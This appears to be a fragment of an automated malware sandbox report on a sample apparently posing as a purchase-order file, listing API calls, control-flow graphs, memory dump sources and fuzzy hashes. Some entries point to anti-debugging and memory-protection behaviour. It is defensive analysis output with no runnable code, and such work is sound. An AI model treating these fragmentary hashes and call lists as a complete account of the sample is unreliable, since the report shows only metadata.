                                                                                                                                                                                                                                      • Instruction ID: bc327ccc9581efb48461641524208388978850a9cbc95875c72352e6873d8a98
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 8d90f0972137776cdfbcd50ab9e155338a8bf24dc0e3c5dfd5eceef02e6e7877
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: F1F0B470A44708EADA3E0768ED4EFF12A10EB0362CFCC55C5E551590B2BB511801D331
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 00000008.00000002.1751784335.0000000002BD0000.00000040.00001000.00020000.00000000.sdmp, Offset: 02BD0000, based on PE: false
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_8_2_2bd0000_PO_2024_056209_MQ04865_ENQ_1045.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID:
                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                      • API String ID:
                                                                                                                                                                                                                                      • Opcode ID: 8084db7fe03ff08b5bea8a29caa0cd69bb0363bdccbe2ff0434da46ff958726e
                                                                                                                                                                                                                                      • Instruction ID: 55c8deb933a2fa454530f2e8a85b675c9abd89ef5abae738f25e567b2fa0100c
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 8084db7fe03ff08b5bea8a29caa0cd69bb0363bdccbe2ff0434da46ff958726e
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 1F71063180D3808FD73A5B389494BF5BB64EB46229FCD86DAD0958F1A3F7318444C762
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 00000008.00000002.1751784335.0000000002BD0000.00000040.00001000.00020000.00000000.sdmp, Offset: 02BD0000, based on PE: false
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_8_2_2bd0000_PO_2024_056209_MQ04865_ENQ_1045.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID:
                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                      • API String ID:
                                                                                                                                                                                                                                      • Opcode ID: 1056c64dc1d1daa616bd39402932bae4c1a1f403756013d8cec8a0a3dcd9bcfe
                                                                                                                                                                                                                                      • Instruction ID: bdbe48193aba0754ead2c05ce28c9251aef069eb4e35766f08bd3ac7d8fa92c7
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 1056c64dc1d1daa616bd39402932bae4c1a1f403756013d8cec8a0a3dcd9bcfe
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 3D31D87090C3408BCB358B2CE4853F9BBACEB81228F8C85DAD0D58A1A6F7759044CB52

                                                                                                                                                                                                                                      Control-flow Graph

                                                                                                                                                                                                                                      • Executed
                                                                                                                                                                                                                                      • Not Executed
                                                                                                                                                                                                                                      control_flow_graph 1834 36a9130-36a91b1 VirtualProtect 1837 36a91ba-36a91df 1834->1837 1838 36a91b3-36a91b9 1834->1838 1838->1837
                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                      • VirtualProtect.KERNEL32(?,?,?,?), ref: 036A91A4
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 00000008.00000002.1759970381.00000000036A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 036A0000, based on PE: false
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_8_2_36a0000_PO_2024_056209_MQ04865_ENQ_1045.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID: ProtectVirtual
                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                      • API String ID: 544645111-0
                                                                                                                                                                                                                                      • Opcode ID: ffb6f0d1fa6e85d9faf76b4bfcce7fc885375c6203f8f6cae63163fc9cf27103
                                                                                                                                                                                                                                      • Instruction ID: 5c9f2c06e43e29dc58316f3721ed48ce4591c862fe559e3d8059ac16b19254a4
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: ffb6f0d1fa6e85d9faf76b4bfcce7fc885375c6203f8f6cae63163fc9cf27103
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: E21136B1D002088FCB10DFAAC884ADEFBF4EF88320F10842AD419A7210C774A944CFA4
                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 00000008.00000002.1751784335.0000000002BD0000.00000040.00001000.00020000.00000000.sdmp, Offset: 02BD0000, based on PE: false
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_8_2_2bd0000_PO_2024_056209_MQ04865_ENQ_1045.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID: FilePointer
                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                      • API String ID: 973152223-0
                                                                                                                                                                                                                                      • Opcode ID: 177833189c8a37ea15f365f65d816bacc8883835a04bdae2965e86e3fe0bf522
                                                                                                                                                                                                                                      • Instruction ID: 3c9fd713c7f5fb6fb5edd2f67a7e0124c55c9706533f2f90042d340d814500b1
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 177833189c8a37ea15f365f65d816bacc8883835a04bdae2965e86e3fe0bf522
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 30019271C0D3409FC7398B24A4457F67BBCEF46214F899ADAE1859B1A2F7748444CB62

                                                                                                                                                                                                                                      Control-flow Graph

                                                                                                                                                                                                                                      • Executed
                                                                                                                                                                                                                                      • Not Executed
                                                                                                                                                                                                                                      control_flow_graph 1982 401870-401883 call 40af66 1985 4018b2 1982->1985 1986 401885-4018a2 SysAllocString 1982->1986 1987 4018b4-4018b8 1985->1987 1986->1987 1988 4018a4-4018a6 1986->1988 1990 4018c4-4018c9 1987->1990 1991 4018ba-4018bf call 40ad90 1987->1991 1988->1987 1989 4018a8-4018ad call 40ad90 1988->1989 1989->1985 1991->1990
                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                        • Part of subcall function 0040AF66: _malloc.LIBCMT ref: 0040AF80
                                                                                                                                                                                                                                      • SysAllocString.OLEAUT32 ref: 00401898
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 00000008.00000002.1743894026.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                      • Associated: 00000008.00000002.1743894026.0000000000426000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000008.00000002.1743894026.000000000045A000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000008.00000002.1743894026.000000000056D000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_8_2_400000_PO_2024_056209_MQ04865_ENQ_1045.jbxd
                                                                                                                                                                                                                                      Yara matches
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID: AllocString_malloc
                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                      • API String ID: 959018026-0
                                                                                                                                                                                                                                      • Opcode ID: 2b2277ba2f7599175ad158743716730806d9da3e8ba5769d67c84622d6ab0768
                                                                                                                                                                                                                                      • Instruction ID: c2922591c351a4c461934d9b8210169c8be4224f150a02a6988c85a72df9e820
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 2b2277ba2f7599175ad158743716730806d9da3e8ba5769d67c84622d6ab0768
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: BEF02073501322A7E3316B658841B47B6E8DF80B28F00823FFD44BB391D3B9C85082EA

                                                                                                                                                                                                                                      Control-flow Graph

                                                                                                                                                                                                                                      • Executed
                                                                                                                                                                                                                                      • Not Executed
                                                                                                                                                                                                                                      control_flow_graph 1994 2bd4b70-2bd4b7c GetUserDefaultUILanguage 1995 2bd4c19 1994->1995 1996 2bd4b82 1994->1996 1998 2bd4c1f-2bd4c24 1995->1998 1999 2bd4f26-2bd4f2f 1995->1999 1996->1995 1997 2bd4b88-2bd4b91 1996->1997 2005 2bd4e69 1997->2005 2006 2bd4b97-2bd4b9c 1997->2006 2000 2bd4f35 1999->2000 2001 2bd4e82 1999->2001 2000->2001 2007 2bd4f3b 2000->2007 2003 2bd4ebb-2bd4ec9 2001->2003 2004 2bd4e84 2001->2004 2009 2bd4e50 2004->2009 2010 2bd4ea3 2004->2010 2005->2001 2007->2007 2009->2010 2011 2bd4e52 2009->2011 2011->2005
                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                      • GetUserDefaultUILanguage.KERNEL32(74DF2EE0,00000001,?,0000004C,00000000,Function_00004F70,00000000,00000000), ref: 02BD4B76
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 00000008.00000002.1751784335.0000000002BD0000.00000040.00001000.00020000.00000000.sdmp, Offset: 02BD0000, based on PE: false
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_8_2_2bd0000_PO_2024_056209_MQ04865_ENQ_1045.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID: DefaultLanguageUser
                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                      • API String ID: 95929093-0
                                                                                                                                                                                                                                      • Opcode ID: ebbd913648c683b9ce10133b7f5f9d7d6768f18e2f46c354c26891ee6edd8c85
                                                                                                                                                                                                                                      • Instruction ID: 3e2e7b52ac6c1cfecea9e88c932ad86552098d890d3eae4a43189a7449481a6f
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: ebbd913648c683b9ce10133b7f5f9d7d6768f18e2f46c354c26891ee6edd8c85
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 67E0D829844912F3EE3C5538C9476F76234E745629FDC0BD37527824F1B7754540C153

                                                                                                                                                                                                                                      Control-flow Graph

                                                                                                                                                                                                                                      • Executed
                                                                                                                                                                                                                                      • Not Executed
                                                                                                                                                                                                                                      control_flow_graph 2012 40d534-40d556 HeapCreate 2013 40d558-40d559 2012->2013 2014 40d55a-40d563 2012->2014
                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                      • HeapCreate.KERNEL32(00000000,00001000,00000000), ref: 0040D549
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 00000008.00000002.1743894026.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                      • Associated: 00000008.00000002.1743894026.0000000000426000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000008.00000002.1743894026.000000000045A000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000008.00000002.1743894026.000000000056D000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_8_2_400000_PO_2024_056209_MQ04865_ENQ_1045.jbxd
                                                                                                                                                                                                                                      Yara matches
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID: CreateHeap
                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                      • API String ID: 10892065-0
                                                                                                                                                                                                                                      • Opcode ID: b92e553731a4154449cde6b8e59536b0b0aa674871376bfeaf174e1f515a675d
                                                                                                                                                                                                                                      • Instruction ID: a29dbb507fbbbc11cf477c5ad410ace9233c9b691e3651c0b65acef059567112
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: b92e553731a4154449cde6b8e59536b0b0aa674871376bfeaf174e1f515a675d
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: E8D05E36A54348AADB11AFB47C08B623BDCE388396F404576F80DC6290F678D641C548

                                                                                                                                                                                                                                      Control-flow Graph

                                                                                                                                                                                                                                      • Executed
                                                                                                                                                                                                                                      • Not Executed
                                                                                                                                                                                                                                      control_flow_graph 2015 40ea0a-40ea16 call 40e8de 2017 40ea1b-40ea1f 2015->2017
                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                      • _doexit.LIBCMT ref: 0040EA16
                                                                                                                                                                                                                                        • Part of subcall function 0040E8DE: __lock.LIBCMT ref: 0040E8EC
                                                                                                                                                                                                                                        • Part of subcall function 0040E8DE: __decode_pointer.LIBCMT ref: 0040E923
                                                                                                                                                                                                                                        • Part of subcall function 0040E8DE: __decode_pointer.LIBCMT ref: 0040E938
                                                                                                                                                                                                                                        • Part of subcall function 0040E8DE: __decode_pointer.LIBCMT ref: 0040E962
                                                                                                                                                                                                                                        • Part of subcall function 0040E8DE: __decode_pointer.LIBCMT ref: 0040E978
                                                                                                                                                                                                                                        • Part of subcall function 0040E8DE: __decode_pointer.LIBCMT ref: 0040E985
                                                                                                                                                                                                                                        • Part of subcall function 0040E8DE: __initterm.LIBCMT ref: 0040E9B4
                                                                                                                                                                                                                                        • Part of subcall function 0040E8DE: __initterm.LIBCMT ref: 0040E9C4
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 00000008.00000002.1743894026.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                      • Associated: 00000008.00000002.1743894026.0000000000426000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000008.00000002.1743894026.000000000045A000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000008.00000002.1743894026.000000000056D000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_8_2_400000_PO_2024_056209_MQ04865_ENQ_1045.jbxd
                                                                                                                                                                                                                                      Yara matches
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID: __decode_pointer$__initterm$__lock_doexit
                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                      • API String ID: 1597249276-0
                                                                                                                                                                                                                                      • Opcode ID: 02276376eab60fb44a6de362a8cb41930a671a9c3f5feaa45b9c6d7d217bd1ad
                                                                                                                                                                                                                                      • Instruction ID: a0257ab8b89ab24c4dda27abc63ac43d0f25756bab2839dd78a8b277d7454467
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 02276376eab60fb44a6de362a8cb41930a671a9c3f5feaa45b9c6d7d217bd1ad
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: D2B0923298420833EA202643AC03F063B1987C0B64E244031BA0C2E1E1A9A2A9618189
                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 00000008.00000002.1759970381.00000000036A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 036A0000, based on PE: false
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_8_2_36a0000_PO_2024_056209_MQ04865_ENQ_1045.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID: CloseHandle
                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                      • API String ID: 2962429428-0
                                                                                                                                                                                                                                      • Opcode ID: ad360391044553508a65f2a8e3843ff5c7d8f665703af21be33354fdf54624a9
                                                                                                                                                                                                                                      • Instruction ID: 1ce26dbe1405deaf07e33f4edc28e611aae3920d996e2cae62d19d3efb5f6ca3
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: ad360391044553508a65f2a8e3843ff5c7d8f665703af21be33354fdf54624a9
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 8B1136B1D002488FCB24DFAAC4457DEFBF4EB88324F248429D559A7250CB74A944CFA4
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 00000008.00000002.1754385015.00000000034AD000.00000040.00000800.00020000.00000000.sdmp, Offset: 034AD000, based on PE: false
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_8_2_34ad000_PO_2024_056209_MQ04865_ENQ_1045.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID:
                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                      • API String ID:
                                                                                                                                                                                                                                      • Opcode ID: f880d3b72498c7acd714dfe440e7c995633bb130675cf333e961a32bec334000
                                                                                                                                                                                                                                      • Instruction ID: 4a425336f6026f3cb893a5c5ae3848bb72d0895889a0c275417b2a15658e345c
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: f880d3b72498c7acd714dfe440e7c995633bb130675cf333e961a32bec334000
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: DA214879900600DFCB08EF18C9C0B1BBF66FBA4315F24C1AAE8090F756C336D446C6A1
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 00000008.00000002.1754385015.00000000034AD000.00000040.00000800.00020000.00000000.sdmp, Offset: 034AD000, based on PE: false
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_8_2_34ad000_PO_2024_056209_MQ04865_ENQ_1045.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID:
                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                      • API String ID:
                                                                                                                                                                                                                                      • Opcode ID: 177c768527f63d703d01f3e54bf2af99e9edba5f85c02dcb16ad1c48a54dd5a1
                                                                                                                                                                                                                                      • Instruction ID: 32b53c700a6d2d321396f4d8088c831ac473fa2af2068473019b0a4a860f234b
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 177c768527f63d703d01f3e54bf2af99e9edba5f85c02dcb16ad1c48a54dd5a1
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 822148B1900600DFCB00EF18C9D0B2BBF65FBA8310F24C5AAE8090F726C336D456CAA5
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 00000008.00000002.1754385015.00000000034AD000.00000040.00000800.00020000.00000000.sdmp, Offset: 034AD000, based on PE: false
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_8_2_34ad000_PO_2024_056209_MQ04865_ENQ_1045.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID:
                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                      • API String ID:
                                                                                                                                                                                                                                      • Opcode ID: b90c45bf349dc2233ec1b6a7f64fdb6126ff75985651e60f21b20b7a1f428906
                                                                                                                                                                                                                                      • Instruction ID: 237da1e9c6f2f638bb30c01d078d096bf5b239cd8ea1d6b89081acb0876e7525
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: b90c45bf349dc2233ec1b6a7f64fdb6126ff75985651e60f21b20b7a1f428906
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: EC11E176804280CFCB02DF04D5C4B16BF71FB94314F28C5AAD8080F626C336D45ACBA1
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 00000008.00000002.1754385015.00000000034AD000.00000040.00000800.00020000.00000000.sdmp, Offset: 034AD000, based on PE: false
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_8_2_34ad000_PO_2024_056209_MQ04865_ENQ_1045.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID:
                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                      • API String ID:
                                                                                                                                                                                                                                      • Opcode ID: b90c45bf349dc2233ec1b6a7f64fdb6126ff75985651e60f21b20b7a1f428906
                                                                                                                                                                                                                                      • Instruction ID: 427dcdcdff663dd2d3d59b648e499031f46e1991a983839fe5ae653804aa0751
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: b90c45bf349dc2233ec1b6a7f64fdb6126ff75985651e60f21b20b7a1f428906
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 6F11B17A904644CFCB06CF14D5C4B1ABF62FBA5314F28C6AAD8090F756C336D45ACBA2
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 00000008.00000002.1754385015.00000000034AD000.00000040.00000800.00020000.00000000.sdmp, Offset: 034AD000, based on PE: false
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_8_2_34ad000_PO_2024_056209_MQ04865_ENQ_1045.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID:
                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                      • API String ID:
                                                                                                                                                                                                                                      • Opcode ID: ebdac7e0b01dbd9694da60a5808d52012366cda60f414cbb2beb8f5b781039ad
                                                                                                                                                                                                                                      • Instruction ID: 61aa0aca3f393d4f418c4c6077eaa0dfb6820c8c3052861f70406a4bb001725a
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: ebdac7e0b01dbd9694da60a5808d52012366cda60f414cbb2beb8f5b781039ad
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: D4018C7140E7C09ED7128B25C894B56BFB4EF53228F0DC0DBD8888F6A3C2699849D772
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 00000008.00000002.1754385015.00000000034AD000.00000040.00000800.00020000.00000000.sdmp, Offset: 034AD000, based on PE: false
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_8_2_34ad000_PO_2024_056209_MQ04865_ENQ_1045.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID:
                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                      • API String ID:
                                                                                                                                                                                                                                      • Opcode ID: e2cfdc0fe185da679a4b13be1a3172f3796fac5e545d015ffdad13e76fa15e1e
                                                                                                                                                                                                                                      • Instruction ID: 0ae715f550f7d5d0efef8e840569b42f20bfceb5da5c53d603185edab78c4415
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: e2cfdc0fe185da679a4b13be1a3172f3796fac5e545d015ffdad13e76fa15e1e
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 1901F77080DB409AE710CA2DCD84767FF98EF52328F0CC46BEC584F646C2799842D6B5
                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                      • IsDebuggerPresent.KERNEL32 ref: 004136F4
                                                                                                                                                                                                                                      • SetUnhandledExceptionFilter.KERNEL32(00000000), ref: 00413709
                                                                                                                                                                                                                                      • UnhandledExceptionFilter.KERNEL32(0041FB80), ref: 00413714
                                                                                                                                                                                                                                      • GetCurrentProcess.KERNEL32(C0000409), ref: 00413730
                                                                                                                                                                                                                                      • TerminateProcess.KERNEL32(00000000), ref: 00413737
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 00000008.00000002.1743894026.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                      • Associated: 00000008.00000002.1743894026.0000000000426000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000008.00000002.1743894026.000000000045A000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000008.00000002.1743894026.000000000056D000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_8_2_400000_PO_2024_056209_MQ04865_ENQ_1045.jbxd
                                                                                                                                                                                                                                      Yara matches
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID: ExceptionFilterProcessUnhandled$CurrentDebuggerPresentTerminate
                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                      • API String ID: 2579439406-0
                                                                                                                                                                                                                                      • Opcode ID: 8d1f5aed7c5dfd20079dd4d946f02ab3c4db913f1b194ab0176bc05653236347
                                                                                                                                                                                                                                      • Instruction ID: 93bf0ba95bc2a0faef8203f21c221f33afe887fd41373e09ae0fa508b254143b
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 8d1f5aed7c5dfd20079dd4d946f02ab3c4db913f1b194ab0176bc05653236347
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: A521C3B4601204EFD720DF65E94A6457FB4FB08356F80407AE50887772E7B86682CF4D
                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                      • IsDebuggerPresent.KERNEL32(?,?,?,?,?,00000000), ref: 02C11459
                                                                                                                                                                                                                                      • SetUnhandledExceptionFilter.KERNEL32(00000000,?,?,?,?,?,00000000), ref: 02C11463
                                                                                                                                                                                                                                      • UnhandledExceptionFilter.KERNEL32(-00000328,?,?,?,?,?,00000000), ref: 02C11470
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 00000008.00000002.1751784335.0000000002BD0000.00000040.00001000.00020000.00000000.sdmp, Offset: 02BD0000, based on PE: false
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_8_2_2bd0000_PO_2024_056209_MQ04865_ENQ_1045.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID: ExceptionFilterUnhandled$DebuggerPresent
                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                      • API String ID: 3906539128-0
                                                                                                                                                                                                                                      • Opcode ID: 02f60baf222c232501203ad02505366c734adb0e2b3bccd51ba9465c618345b5
                                                                                                                                                                                                                                      • Instruction ID: af16634ddb237e866dddc3fb7f0ee80e748dd417613de900ea917e82ebc7ef01
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 02f60baf222c232501203ad02505366c734adb0e2b3bccd51ba9465c618345b5
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 57310375D0122CABCB21DF68D889B8CBBB8BF09310F5042EAE40DA7250E7749B919F44
                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                      • GetCurrentProcess.KERNEL32(00000003,?,02C13F13,00000003,02C2DE80,0000000C,02C1403D,00000003,00000002,00000000,?,02C12038,00000003), ref: 02C13F5E
                                                                                                                                                                                                                                      • TerminateProcess.KERNEL32(00000000,?,02C13F13,00000003,02C2DE80,0000000C,02C1403D,00000003,00000002,00000000,?,02C12038,00000003), ref: 02C13F65
                                                                                                                                                                                                                                      • ExitProcess.KERNEL32 ref: 02C13F77
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 00000008.00000002.1751784335.0000000002BD0000.00000040.00001000.00020000.00000000.sdmp, Offset: 02BD0000, based on PE: false
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_8_2_2bd0000_PO_2024_056209_MQ04865_ENQ_1045.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID: Process$CurrentExitTerminate
                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                      • API String ID: 1703294689-0
                                                                                                                                                                                                                                      • Opcode ID: 09c502bb5fb3fc9ea713db1375a8c0633191932b18a3e1e45827c4eee39bb0f7
                                                                                                                                                                                                                                      • Instruction ID: 844cd3a36ce29e7eacd863ef3aba362bdf4f0926024e6feae1c0ad964e3c58c7
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 09c502bb5fb3fc9ea713db1375a8c0633191932b18a3e1e45827c4eee39bb0f7
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: C6E04631545948ABCF116F68DD0AB583B3AFB8A395F104894F8098B121DB36DD53EA80
                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                      • GetProcessHeap.KERNEL32 ref: 0040ADD0
                                                                                                                                                                                                                                      • HeapFree.KERNEL32(00000000,00000000,00000000), ref: 0040ADE1
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 00000008.00000002.1743894026.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                      • Associated: 00000008.00000002.1743894026.0000000000426000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000008.00000002.1743894026.000000000045A000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000008.00000002.1743894026.000000000056D000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_8_2_400000_PO_2024_056209_MQ04865_ENQ_1045.jbxd
                                                                                                                                                                                                                                      Yara matches
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID: Heap$FreeProcess
                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                      • API String ID: 3859560861-0
                                                                                                                                                                                                                                      • Opcode ID: 97be969a41baf58eb72298c462d2c401217e5b830f10c891868ac5f2a1a85b43
